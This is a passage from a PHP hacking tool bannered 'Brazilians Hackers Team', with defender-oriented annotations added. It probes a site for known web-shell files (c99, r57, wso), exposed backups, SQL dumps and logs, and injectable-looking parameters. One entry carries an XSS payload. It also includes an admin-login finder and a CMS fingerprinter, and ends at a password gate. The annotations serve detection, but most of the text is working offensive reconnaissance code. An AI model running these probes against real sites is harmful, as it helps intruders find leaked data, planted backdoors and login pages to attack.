  1142. "/includes/api/3/api_gotonewpost.php",
  1143. "/includes/api/4/album_user.php",
  1144. "/includes/api/4/api_forumlist.php",
  1145. "/includes/api/4/api_getnewtop.php",
  1146. "/includes/api/4/breadcrumbs_create.php",
  1147. "/includes/api/4/facebook_getforumid.php",
  1148. "/includes/api/4/facebook_getnewforummembers.php",
  1149. "/includes/api/4/get_vbfromfacebook.php",
  1150. "/includes/api/4/login_facebook.php",
  1151. "/includes/api/4/newreply_postreply.php",
  1152. "/includes/api/4/newthread_postthread.php",
  1153. "/includes/api/4/register.php",
  1154. "/includes/api/4/register_addmember.php",
  1155. "/includes/api/4/search_findusers.php",
  1156. "/includes/api/4/subscription_viewsubscription.php",
  1157. "/includes/api/5/api_init.php",
  1158. "/includes/api/6/api_getnewtop.php",
  1159. "/includes/api/6/api_gotonewpost.php",
  1160. "/includes/api/6/content.php",
  1161. "/includes/api/6/member.php",
  1162. "/includes/api/6/newthread_newthread.php",
  1163. "/includes/block/blogentries.php",
  1164. "/includes/block/cmsarticles.php",
  1165. "/includes/block/html.php",
  1166. "/includes/block/newposts.php",
  1167. "/includes/block/sgdiscussions.php",
  1168. "/includes/block/tagcloud.php",
  1169. "/includes/block/threads.php",
  1170. "/forumrunner/include/subscriptions.php",
  1171. "/forumrunner/include/search_forum.php",
  1172. "/forumrunner/include/profile.php",
  1173. "/forumrunner/include/post.php",
  1174. "/forumrunner/include/pms.php",
  1175. "/forumrunner/include/online.php",
  1176. "/forumrunner/include/moderation.php",
  1177. "/forumrunner/include/misc.php",
  1178. "/forumrunner/include/login.php",
  1179. "/forumrunner/include/get_thread.php",
  1180. "/forumrunner/include/get_forum.php",
  1181. "/forumrunner/include/cms.php",
  1182. "/forumrunner/include/attach.php",
  1183. "/forumrunner/include/announcement.php",
  1184. "/forumrunner/include/album.php",
  1185. "/forumrunner/support/vbulletin_methods.php",
  1186. "/forumrunner/support/stringparser_bbcode.class.php",
  1187. "/forumrunner/support/utils.php",
  1188. "/forumrunner/support/other_methods.php",
  1189. "/packages/skimlinks/hooks/postbit_display_complete.php",
  1190. "/packages/skimlinks/hooks/showthread_complete.php",
  1191. "/packages/skimlinks/hooks/userdata_start.php",
  // More web-shell and uploader file names, under uploads/ and images/.
  1192. "/uploads/r57.php",
  1193. "/uploads/0day.php",
  1194. "/images/c99.php",
  1195. "/images/upload.php",
  1196. "/images/wso.php",
  1197. "/images/stories/0day.php",
  1198. "/images/stories/3xp.php",
  1199. "/images/x.php",
  1200. "/images/stories/x.php",
  // Information files, site archives, SQL dumps, logs and control-panel paths.
  1201. "/robots.txt",
  1202. "/readme.html",
  1203. "/phpinfo.php",
  1204. "/up.php",
  1205. "/upload.php",
  1206. "/uploads.php",
  1207. "/vb.zip",
  1208. "/vb.rar",
  1209. "/vb.tar",
  1210. "/vb.tar.gz",
  1211. "/site.zip",
  1212. "/site.rar",
  1213. "/site.tar",
  1214. "/site.tar.gz",
  1215. "/home.zip",
  1216. "/home.rar",
  1217. "/home.tar",
  1218. "/home.tar.gz",
  1219. "/forum.zip",
  1220. "/forum.rar",
  1221. "/forum.tar",
  1222. "/forum.tar.gz",
  1223. "/test.txt",
  1224. "/ftp.txt",
  1225. "/user.txt",
  1226. "/site.txt",
  1227. "/error_log",
  1228. "/error",
  1229. "/cpanel",
  1230. "/awstats",
  1231. "/site.sql",
  1232. "/vb.sql",
  1233. "/forum.sql",
  1234. "/backup.sql",
  1235. "/back.sql",
  1236. "/data.sql",
  1237. "/backup.zip",
  1238. "/backup.tar.gz",
  1239. "/backup-wp.zip",
  1240. "/backup-wp.tar.gz",
  1241. "/wp-backup.zip",
  1242. "/wp-backup.tar.gz",
  1243. "/wp-backup.tar",
  1244. "/backup/backup.zip",
  1245. "/backup/backup.tar",
  1246. "/backup/backup.tar.gz",
  // Generic page names with a parameter left empty; many entries are repeated,
  // so the same URL is requested more than once.
  1247. "/general.php?*id=",
  1248. "/careers-detail.asp?id=",
  1249. "/WhatNew.asp?page=",
  1250. "/gallery.asp?cid=",
  1251. "/publications.asp?type=",
  1252. "/mpfn?id=",
  1253. "/reservations.php?id=",
  1254. "/list_blogs.php?sort_mode=",
  1255. "/eventdetails.php?*=",
  1256. "/commodities.php?*id=",
  1257. "/recipe-view.php?id=",
  1258. "/product.php?mid=",
  1259. "/view_ad.php?id=",
  1260. "/imprimir.php?id=",
  1261. "/prodotti.php?id=",
  1262. "/index.cgi?aktion=",
  1263. "/default.php?id=",
  1264. "/default.php?portalID=",
  1265. "/news.php?id=",
  1266. "/articles.php?id=",
  1267. "/os_view_full.php?",
  1268. "/Content.asp?id=",
  1269. "/CollectionContent.asp?id=",
  1270. "/Details.asp?id=",
  1271. "/index.php?pgId=",
  1272. "/index.php?PID=",
  1273. "/dosearch.asp?id=",
  1274. "/details.php?linkid=",
  1275. "/viewfaqs.php?cat=",
  1276. "/calendar.php?token=",
  1277. "/games.php?id=",
  1278. "/gmap.php?id=",
  1279. "/index.php?txtCodiInfo=",
  1280. "/notizia.php?idArt=",
  1281. "/read.php?id=",
  1282. "/ViewerFrame?Mode=",
  1283. "/productinfo.php?id=",
  1284. "/collectionitem.php?id=",
  1285. "/band_info.php?id=",
  1286. "/product.php?id=",
  1287. "/releases.php?id=",
  1288. "/ray.php?id=",
  1289. "/produit.php?id=",
  1290. "/pop.php?id=",
  1291. "/shopping.php?id=",
  1292. "/productdetail.php?id=",
  1293. "/post.php?id=",
  1294. "/viewshowdetail.php?id=",
  1295. "/clubpage.php?id=",
  1296. "/memberInfo.php?id=",
  1297. "/section.php?id=",
  1298. "/theme.php?id=",
  1299. "/page.php?id=",
  1300. "/shredder-categories.php?id=",
  1301. "/tradeCategory.php?id=",
  1302. "/product_ranges_view.php?ID=",
  1303. "/shop_category.php?id=",
  1304. "/transcript.php?id=",
  1305. "/channel_id=",
  1306. "/item_id=",
  1307. "/newsid=",
  1308. "/trainers.php?id=",
  1309. "/news-full.php?id=",
  1310. "/news_display.php?getid=",
  1311. "/index2.php?option=",
  1312. "/readnews.php?id=",
  1313. "/top10.php?cat=",
  1314. "/newsone.php?id=",
  1315. "/event.php?id=",
  1316. "/product-item.php?id=",
  1317. "/sql.php?id=",
  1318. "/aboutbook.php?id=",
  1319. "/preview.php?id=",
  1320. "/loadpsb.php?id=",
  1321. "/pages.php?id=",
  1322. "/material.php?id=",
  1323. "/clanek.php4?id=",
  1324. "/announce.php?id=",
  1325. "/chappies.php?id=",
  1326. "/read.php?id=",
  1327. "/viewapp.php?id=",
  1328. "/viewphoto.php?id=",
  1329. "/rub.php?idr=",
  1330. "/galeri_info.php?l=",
  1331. "/review.php?id=",
  1332. "/iniziativa.php?in=",
  1333. "/curriculum.php?id=",
  1334. "/labels.php?id=",
  1335. "/story.php?id=",
  1336. "/look.php?ID=",
  1337. "/newsone.php?id=",
  1338. "/aboutbook.php?id=",
  1339. "/material.php?id=",
  1340. "/opinions.php?id=",
  1341. "/announce.php?id=",
  1342. "/rub.php?idr=",
  1343. "/galeri_info.php?l=",
  1344. "/tekst.php?idt=",
  1345. "/newscat.php?id=",
  1346. "/newsticker_info.php?idn=",
  1347. "/rubrika.php?idr=",
  1348. "/rubp.php?idr=",
  1349. "/offer.php?idf=",
  1350. "/art.php?idm=",
  1351. "/title.php?id=",
  1352. "/trainers.php?id=",
  1353. "/buy.php?category=",
  1354. "/article.php?ID=",
  1355. "/play_old.php?id=",
  1356. "/declaration_more.php?decl_id=",
  1357. "/Pageid=",
  1358. "/games.php?id=",
  1359. "/page.php?file=",
  1360. "/newsDetail.php?id=",
  1361. "/gallery.php?id=",
  1362. "/article.php?id=",
  1363. "/show.php?id=",
  1364. "/staff_id=",
  1365. "/newsitem.php?num=",
  1366. "/readnews.php?id=",
  1367. "/top10.php?cat=",
  1368. "/historialeer.php?num=",
  1369. "/reagir.php?num=",
  1370. "/forum_bds.php?num=",
  1371. "/game.php?id=",
  1372. "/view_product.php?id=",
  1373. "/newsone.php?id=",
  1374. "/sw_comment.php?id=",
  1375. "/news.php?id=",
  1376. "/avd_start.php?avd=",
  1377. "/event.php?id=",
  1378. "/product-item.php?id=",
  1379. "/sql.php?id=",
  1380. "/news_view.php?id=",
  1381. "/select_biblio.php?id=",
  1382. "/humor.php?id=",
  1383. "/aboutbook.php?id=",
  1384. "/fiche_spectacle.php?id=",
  1385. "/communique_detail.php?id=",
  1386. "/sem.php3?id=",
  1387. "/kategorie.php4?id=",
  1388. "/news.php?id=",
  1389. "/index.php?id=",
  1390. "/faq2.php?id=",
  1391. "/show_an.php?id=",
  1392. "/preview.php?id=",
  1393. "/loadpsb.php?id=",
  1394. "/opinions.php?id=",
  1395. "/spr.php?id=",
  1396. "/pages.php?id=",
  1397. "/announce.php?id=",
  1398. "/clanek.php4?id=",
  1399. "/participant.php?id=",
  1400. "/download.php?id=",
  1401. "/main.php?id=",
  1402. "/review.php?id=",
  1403. "/chappies.php?id=",
  1404. "/read.php?id=",
  1405. "/prod_detail.php?id=",
  1406. "/viewphoto.php?id=",
  1407. "/article.php?id=",
  1408. "/person.php?id=",
  1409. "/productinfo.php?id=",
  1410. "/showimg.php?id=",
  1411. "/view.php?id=",
  1412. "/website.php?id=",
  1413. "/hosting_info.php?id=",
  1414. "/gallery.php?id=",
  1415. "/rub.php?idr=",
  1416. "/view_faq.php?id=",
  1417. "/artikelinfo.php?id=",
  1418. "/detail.php?ID=",
  1419. "/index.php?=",
  1420. "/profile_view.php?id=",
  1421. "/category.php?id=",
  1422. "/publications.php?id=",
  1423. "/fellows.php?id=",
  1424. "/downloads_info.php?id=",
  1425. "/prod_info.php?id=",
  1426. "/shop.php?do=,part&id=",
  1427. "/Productinfo.php?id=",
  1428. "/collectionitem.php?id=",
  1429. "/band_info.php?id=",
  1430. "/product.php?id=",
  1431. "/releases.php?id=",
  1432. "/ray.php?id=",
  1433. "/produit.php?id=",
  1434. "/pop.php?id=",
  1435. "/shopping.php?id=",
  1436. "/productdetail.php?id=",
  1437. "/post.php?id=",
  1438. "/viewshowdetail.php?id=",
  1439. "/clubpage.php?id=",
  1440. "/memberInfo.php?id=",
  1441. "/section.php?id=",
  1442. "/theme.php?id=",
  1443. "/page.php?id=",
  1444. "/shredder-categories.php?id=",
  1445. "/tradeCategory.php?id=",
  1446. "/product_ranges_view.php?ID=",
  1447. "/shop_category.php?id=",
  1448. "/transcript.php?id=",
  1449. "/channel_id=",
  1450. "/item_id=",
  1451. "/newsid=",
  1452. "/trainers.php?id=",
  1453. "/news-full.php?id=",
  1454. "/news_display.php?getid=",
  1455. "/index2.php?option=",
  1456. "/readnews.php?id=",
  1457. "/top10.php?cat=",
  1458. "/newsone.php?id=",
  1459. "/event.php?id=",
  1460. "/product-item.php?id=",
  1461. "/sql.php?id=",
  1462. "/aboutbook.php?id=",
  1463. "/review.php?id=",
  1464. "/loadpsb.php?id=",
  1465. "/ages.php?id=",
  1466. "/material.php?id=",
  1467. "/clanek.php4?id=",
  1468. "/announce.php?id=",
  1469. "/chappies.php?id=",
  1470. "/read.php?id=",
  1471. "/viewapp.php?id=",
  1472. "/viewphoto.php?id=",
  1473. "/rub.php?idr=",
  1474. "/galeri_info.php?l=",
  1475. "/review.php?id=",
  1476. "/iniziativa.php?in=",
  1477. "/curriculum.php?id=",
  1478. "/labels.php?id=",
  1479. "/look.php?ID=",
  1480. "/newsone.php?id=",
  1481. "/aboutbook.php?id=",
  1482. "/material.php?id=",
  1483. "/opinions.php?id=",
  1484. "/announce.php?id=",
  1485. "/rub.php?idr=",
  1486. "/galeri_info.php?l=",
  1487. "/tekst.php?idt=",
  1488. "/newscat.php?id=",
  1489. "/newsticker_info.php?idn=",
  1490. "/rubrika.php?idr=",
  1491. "/rubp.php?idr=",
  1492. "/offer.php?idf=",
  1493. "/art.php?idm=",
  1494. "/title.php?id=",
  // Page- and file-style parameters, then a single entry carrying a script tag
  // in the query string.
  1495. "/db.php?path_local=",
  1496. "/principal.php?conteudo=",
  1497. "/main.php?site=",
  1498. "/template.php?pagina=",
  1499. "/contenido.php?sec=",
  1500. "/index_principal.php?pagina=",
  1501. "/template.php?name=",
  1502. "/forum.php?act=",
  1503. "/home.php?action=",
  1504. "/home.php?pagina=",
  1505. "/noticias.php?arq=",
  1506. "/main.php?x=",
  1507. "/main.php?page=",
  1508. "/default.php?page=",
  1509. "/search.php?id=1<script>alert(21)</script>");
  // One request per entry: base URL + "/" + entry. Unlike the WordPress scanners
  // above, the test is inverted: a URL is printed whenever the first header line
  // does not contain "404", so redirects and 403/500 responses are printed as
  // well. The response body is never read.
  1510. foreach($dangpath as $papa){
  1511. $houwari="$gnsc/$papa";
  1512. $fati=get_headers($houwari);
  1513. $lambilonce=preg_match("/404/",$fati[0]);
  1514. if(!$lambilonce){
  1515.  
  1516. echo "Encontrado \n";
  1517. echo"$houwari\n";
  1518.  
  1519. }
  1520. }
  1521.  
  1522.  
  1523.  
  1524. }
  1525. /////////////////////////////////////////////////////////////////////////////////////////////////////////
  1526. if($id == 4){
  1527. echo "
  1528. +#############################+
  1529. # #
  1530. # *** Brazilians Hackers Team #
  1531. # #
  1532. +#############################+
  1533. *******************************
  1534. ******ADMIN PAINEL FINDER******
  1535. *******************************
  1536. Comando http://
  1537.  
  1538. *******************************\n\n";
  1539. echo"Entre Com Seu Site ===>";
  1540. $adminpanel=trim(fgets(STDIN,1024));
  1541. $nhy=array(
  1542. "admin.asp",
  1543. "login.asp",
  1544. "admin/account.asp",
  1545. "admin/login.asp",
  1546. "admin/login.asp",
  1547. "admin/home.asp",
  1548. "admin/controlpanel.asp",
  1549. "admin/cp.asp",
  1550. "admin/adminLogin.asp",
  1551. "admin/admin_login.asp",
  1552. "admin/controlpanel.asp",
  1553. "admin/admin-login.asp",
  1554. "admin-login.asp",
  1555. "admin/account.asp",
  1556. "admin/admin.asp",
  1557. "admin.asp",
  1558. "adminitem.asp",
  1559. "adminitems.asp",
  1560. "administrator/login.asp",
  1561. "administrator.asp",
  1562. "administration.asp",
  1563. "adminLogin/",
  1564. "adminlogin.asp",
  1565. "admin_area/admin.asp",
  1566. "admin_area/login.asp",
  1567. "manager.asp",
  1568. "letmein.asp",
  1569. "admin.php",
  1570. "login.php",
  1571. "login.php",
  1572. "login/",
  1573. "login.php",
  1574. "adm/",
  1575. "admin/",
  1576. "admin/account.php",
  1577. "admin/login.php",
  1578. "admin/login.php",
  1579. "admin/home.php",
  1580. "admin/controlpanel.php",
  1581. "admin/controlpanel.php",
  1582. "admin/cp.php",
  1583. "admin/adminLogin.php",
  1584. "admin/adminLogin.php",
  1585. "admin/admin_login.php",
  1586. "admin/controlpanel.php",
  1587. "admin/admin-login.php",
  1588. "admin-login.php",
  1589. "admin/account.php",
  1590. "admin/admin.php",
  1591. "admin.php",
  1592. "admin.php",
  1593. "adminitem/",
  1594. "adminitem.php",
  1595. "adminitems/",
  1596. "adminitems.php",
  1597. "administrator/",
  1598. "administrator/",
  1599. "administrator.php",
  1600. "administration/",
  1601. "administration.php",
  1602. "adminLogin/",
  1603. "adminlogin.php",
  1604. "admin_area/admin.php",
  1605. "admin_area/",
  1606. "admin_area/login.php",
  1607. "manager/",
  1608. "manager.php",
  1609. "letmein/",
  1610. "letmein.php",
  1611. "superuser/",
  1612. "superuser.php",
  1613. "access/",
  1614. "access.php",
  1615. "sysadm/",
  1616. "sysadm.php",
  1617. "superman/",
  1618. "supervisor/",
  1619. "panel.php",
  1620. "control/",
  1621. "control.php",
  1622. "member/",
  1623. "member.php",
  1624. "members/",
  1625. "members.php",
  1626. "user/",
  1627. "user.php",
  1628. "cp/",
  1629. "uvpanel/",
  1630. "manage/",
  1631. "manage.php",
  1632. "management/",
  1633. "management.php",
  1634. "signin/",
  1635. "signin.php",
  1636. "log-in/",
  1637. "log-in.php",
  1638. "log_in/",
  1639. "log_in.php",
  1640. "sign_in/",
  1641. "sign_in.php",
  1642. "sign-in/",
  1643. "sign-in.php",
  1644. "users/",
  1645. "users.php",
  1646. "accounts/",
  1647. "accounts.php",
  1648. "wp-login.php",
  1649. "bb-admin/login.php",
  1650. "bb-admin/admin.php",
  1651. "bb-admin/admin.php",
  1652. "administrator/account.php",
  1653. "relogin.php",
  1654. "relogin.php",
  1655. "check.php",
  1656. "relogin.php",
  1657. "blog/wp-login.php",
  1658. "user/admin.php",
  1659. "users/admin.php",
  1660. "registration/",
  1661. "processlogin.php",
  1662. "checklogin.php",
  1663. "checkuser.php",
  1664. "checkadmin.php",
  1665. "isadmin.php",
  1666. "authenticate.php",
  1667. "authentication.php",
  1668. "auth.php",
  1669. "authuser.php",
  1670. "authadmin.php",
  1671. "cp.php",
  1672. "modelsearch/",
  1673. "moderator.php",
  1674. "moderator/",
  1675. "controlpanel/",
  1676. "controlpanel.php",
  1677. "admincontrol.php",
  1678. "adminpanel.php",
  1679. "fileadmin/",
  1680. "fileadmin.php",
  1681. "sysadmin.php",
  1682. "admin1.php",
  1683. "admin1.php" ,
  1684. "admin1.php",
  1685. "admin2.php",
  1686. "admin2.php",
  1687. "yonetim.php",
  1688. "yonetim.php",
  1689. "yonetici.php",
  1690. "yonetici.php",
  1691. "phpmyadmin/",
  1692. "myadmin/",
  1693. "ur-admin.php",
  1694. "ur-admin/",
  1695. "Server.php",
  1696. "Server/",
  1697. "wp-admin/",
  1698. "administr8.php",
  1699. "administr8/",
  1700. "webadmin/",
  1701. "webadmin.php",
  1702. "administratie/",
  1703. "admins/",
  1704. "admins.php",
  1705. "administrivia/",
  1706. "Database_Administration/",
  1707. "useradmin/",
  1708. "sysadmins/",
  1709. "admin1/",
  1710. "system-administration/",
  1711. "administrators/",
  1712. "pgadmin/",
  1713. "directadmin/",
  1714. "staradmin/",
  1715. "ServerAdministrator/",
  1716. "SysAdmin/",
  1717. "administer/",
  1718. "LiveUser_Admin/",
  1719. "sys-admin/",
  1720. "typo3/",
  1721. "panel/",
  1722. "cpanel/",
  1723. "cpanel_file/",
  1724. "platz_login/",
  1725. "rcLogin/",
  1726. "blogindex/",
  1727. "formslogin/",
  1728. "autologin/",
  1729. "support_login/",
  1730. "meta_login/",
  1731. "manuallogin/",
  1732. "simpleLogin/",
  1733. "loginflat/",
  1734. "utility_login/",
  1735. "showlogin/",
  1736. "memlogin/",
  1737. "login-redirect/",
  1738. "sub-login/",
  1739. "wp-login/",
  1740. "login1/",
  1741. "dir-login/",
  1742. "login_db/",
  1743. "xlogin/",
  1744. "smblogin/",
  1745. "customer_login/",
  1746. "UserLogin/",
  1747. "login-us/",
  1748. "acct_login/",
  1749. "bigadmin/",
  1750. "project-admins/",
  1751. "phppgadmin/",
  1752. "pureadmin/",
  1753. "sql-admin/",
  1754. "radmind/",
  1755. "openvpnadmin/",
  1756. "wizmysqladmin/",
  1757. "vadmind/",
  1758. "ezsqliteadmin/",
  1759. "hpwebjetadmin/",
  1760. "newsadmin/",
  1761. "adminpro/",
  1762. "Lotus_Domino_Admin/",
  1763. "bbadmin/",
  1764. "vmailadmin/",
  1765. "Indy_admin/",
  1766. "ccp14admin/",
  1767. "irc-macadmin/",
  1768. "banneradmin/",
  1769. "sshadmin/",
  1770. "phpldapadmin/",
  1771. "macadmin/",
  1772. "administratoraccounts/",
  1773. "admin4_account/",
  1774. "admin4_colon/",
  1775. "radmind-1/",
  1776. "Super-Admin/",
  1777. "AdminTools/",
  1778. "cmsadmin/",
  1779. "SysAdmin2/",
  1780. "globes_admin/",
  1781. "cadmins/",
  1782. "phpSQLiteAdmin/",
  1783. "navSiteAdmin/",
  1784. "server_admin_small/",
  1785. "logo_sysadmin/",
  1786. "power_user/",
  1787. "system_administration/",
  1788. "ss_vms_admin_sm/",
  1789. "bb-admin/",
  1790. "panel-administracion/",
  1791. "instadmin/",
  1792. "memberadmin/",
  1793. "administratorlogin/",
  1794. "adm.php",
  1795. "admin_login.php",
  1796. "panel-administracion/login.php",
  1797. "pages/admin/admin-login.php",
  1798. "pages/admin/",
  1799. "acceso.php",
  1800. "admincp/login.php",
  1801. "admincp/",
  1802. "adminarea/",
  1803. "admincontrol/",
  1804. "affiliate.php",
  1805. "adm_auth.php",
  1806. "memberadmin.php",
  1807. "administratorlogin.php",
  1808. "modulesadmin/",
  1809. "administrators.php",
  1810. "siteadmin/",
  1811. "siteadmin.php",
  1812. "adminsite/",
  1813. "kpanel/",
  1814. "vorod/",
  1815. "vorod.php",
  1816. "vorud/",
  1817. "vorud.php",
  1818. "adminpanel/",
  1819. "PSUser/",
  1820. "secure/",
  1821. "webmaster/",
  1822. "webmaster.php",
  1823. "autologin.php",
  1824. "userlogin.php",
  1825. "admin_area.php",
  1826. "cmsadmin.php",
  1827. "security/",
  1828. "usr/",
  1829. "root/",
  1830. "secret/",
  1831. "admin/login.php",
  1832. "admin/adminLogin.php",
  1833. "moderator.php",
  1834. "moderator.php",
  1835. "moderator/login.php",
  1836. "moderator/admin.php",
  1837. "yonetici.php",
  1838. "0admin/",
  1839. "0manager/",
  1840. "aadmin/",
  1841. "cgi-bin/login",
  1842. "login1",
  1843. "login_admin/",
  1844. "login_admin",
  1845. "login_out/",
  1846. "login_out",
  1847. "login_user",
  1848. "loginerror/",
  1849. "loginok/",
  1850. "loginsave/",
  1851. "loginsuper/",
  1852. "loginsuper",
  1853. "login",
  1854. "logout/",
  1855. "logout",
  1856. "secrets/",
  1857. "super1/",
  1858. "super1",
  1859. "super_index",
  1860. "super_login",
  1861. "supermanager",
  1862. "superman/",
  1863. "superuser/",
  1864. "supervise/",
  1865. "supervise/",
  1866. "super/",
  1867. );
  // Admin-path probe. For every entry of $nhy (presumably the path list that
  // closes just above) one URL is built as "$adminpanel/<entry>" and requested.
  // $adminpanel is assigned outside this excerpt -- presumably the base URL the
  // operator typed in; confirm against the earlier lines.
  //
  // Defender view: in access logs this is a rapid run of requests from a single
  // client for login/admin paths, in list order and with repeats (the list
  // contains duplicate entries), almost all answered with 404. Alerting on 404
  // bursts against such paths and rate limiting per client both catch it.
  // Restricting admin interfaces by network or an extra authentication layer
  // makes a discovered path much less useful.
  1868. foreach($nhy as $noip) {
  1869. $noipno="$adminpanel/$noip";
  // get_headers() performs the HTTP request (GET unless a stream context
  // overrides it) and returns the response header lines; index 0 is the status line.
  1870. $lyzi= get_headers($noipno);
  // The only test is whether "404" occurs in the status line.
  1871. $ilovesleep=preg_match("/404/",$lyzi[0]);
  // Everything that is not a 404 is printed as "Encontrado" ("found"): redirects,
  // 401/403, 5xx, and also a failed request (get_headers() returns false, so
  // $lyzi[0] is null and the pattern cannot match). The output is therefore noisy
  // and says nothing about whether a login page is actually there.
  1872. if(!$ilovesleep){
  1873. echo"\nEncontrado\n$noipno\n";
  1874. }
  1875.  
  1876.  
  1877.  
  1878. }
  1879. }
  // Menu option 5 ($id is set outside this excerpt): CMS fingerprinting.
  // Reads a base URL from STDIN and requests a handful of product-specific
  // files; a non-empty response body is taken as proof of the product.
  //
  // Defender view: the five paths below are requested by one client within
  // moments of each other. The WordPress and Joomla entries start with "/" and the
  // code inserts another "/", so those requests carry a doubled slash after the
  // base URL (for example "<base>//wp-settings.php") -- a usable log signature.
  // Fingerprinting through public static files cannot really be prevented; its
  // value to a defender is as an early indicator that targeted requests may follow.
  1880. if($id == 5){
  1881. echo"
  1882. +#############################+
  1883. # #
  1884. # *** Brazilians Hackers Team #
  1885. # #
  1886. +#############################+
  1887. *******************************
  1888. *** Check O Tipo De Script ***
  1889. ***** WordPress E Joomla *****
  1890. ***********************************\n
  1891. ";
  1892. echo"Entre Com Seu Site http//\n======>";
  // Base URL as typed by the operator; only trimmed, never validated.
  1893. $typesite=trim(fgets(STDIN,1024));
  1894. // Check whether the site is WordPress.
  1895. if($typesite) {
  1896. $wordpress1=array(
  1897. "/wp-settings.php");
  1898. foreach ($wordpress1 as $word11){
  1899. $alltypewp="$typesite/$word11";
  // "@" hides warnings; file_get_contents() returns false on failure, so the
  // test below passes only when a non-empty body (other than "0") was returned.
  1900. $yehhh=@file_get_contents($alltypewp);
  1901. if ($yehhh)
  1902. {
  // "Esse Site Usa" = "This site uses".
  1903. echo"\n Esse Site Usa ======> wordpress";
  1904. }
  1905.  
  1906. }
  1907. // Joomla check: a stock template stylesheet and a core component's metadata file.
  1908. $najnzopza=array(
  1909. "/templates/beez5/css/beez5.css",
  1910. "/components/com_content/metadata.xml",);
  // Each of the two files is tested independently, so the Joomla line can be
  // printed twice for the same site.
  1911. foreach($najnzopza as $niuo){
  1912. $alltypejoomla="$typesite/$niuo";
  1913. $lkaxi=@file_get_contents($alltypejoomla);
  1914. if($lkaxi){
  1915.  
  1916. echo "\n Esse Site Usa =====> joomla";
  1917. }
  1918.  
  1919. }
  1920. }
  1921. // vBulletin check. This and the WHMCS check sit outside the if($typesite)
  // guard, so they also run when the input was empty; the argument is then a
  // local path ("/clientscript/...") instead of a URL.
  1922. $vBulletin=@file_get_contents("$typesite/clientscript/vbulletin_ajax_imagereg.js");
  1923. if($vBulletin){
  1924. echo"Esse Site Usa vBulletin";
  1925. }
  1926. // WHMCS check. NOTE(review): templates/classic/style.css looks generic enough
  // that other applications could serve a file there -- treat a hit as weak evidence.
  1927. $whmc=@file_get_contents("$typesite/templates/classic/style.css");
  1928. if($whmc){
  1929. echo "Esse Site Usa whmcs";
  1930.  
  1931. }
  1932.  
  1933.  
  1934.  
  1935. }
  1936.  
  1937.  
  1938.  
  1939.  
  1940.  
  1941.  
  1942. }else{
  1943. echo "Senha Invalida";
  1944. }
  1945. ?>